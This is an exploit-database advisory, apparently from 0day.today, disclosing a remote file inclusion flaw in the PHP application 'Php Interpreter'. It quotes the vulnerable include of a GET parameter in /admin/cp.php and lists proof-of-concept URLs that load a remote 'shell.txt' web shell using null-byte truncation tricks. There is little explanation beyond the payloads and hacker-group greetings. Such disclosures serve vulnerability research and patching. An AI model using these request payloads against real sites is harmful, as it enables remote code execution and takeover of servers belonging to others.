id: 17845
date: 03/27/2012
title: Php Interpreter Remote File Include Vulnerabilities
author: L3b-r1'z
cves: 

# TITLE : Php Interpreter Remote File Include Vulnerabilities
# Google Dork: N\A
# Download: http://sourceforge.net/projects/phpinterpreter/files/latest/download?source=directory
# Date: 27.mar.12
# Contact: L3b-r1z@live.com \ L3br1z@gmail.com
# Follow: @L3br1z
# www.sec4ever.com
# Greet'z : B0x , Mr.Ps , Mr.BLack , Lito , Mr.XKiller , Mad Hacker'z , Hacker-1420 , unk Hacker , Sec4ever , I-HMX ( My Bro ;) ) , Mr.Hacker , And All My Friends .

 
 
File: /admin/cp.php
=======================
 
37: $_SESSION['page']        = $_GET['page'];
    154: <?php echo include($_SESSION['page'] . '.php'); ?>
 
PoC:
http://localhost/interpreter/admin/cp.php?page=Evil Url

Example :
http://localhost/interpreter/admin/cp.php?page=http://localhost/shell.txt%00.php
or
http://localhost/interpreter/admin/cp.php?page=http://localhost/shell.txt%00
or
http://localhost/interpreter/admin/cp.php?page=http://localhost/shell.txt?%00



#  0day.today [2023-03-25]  #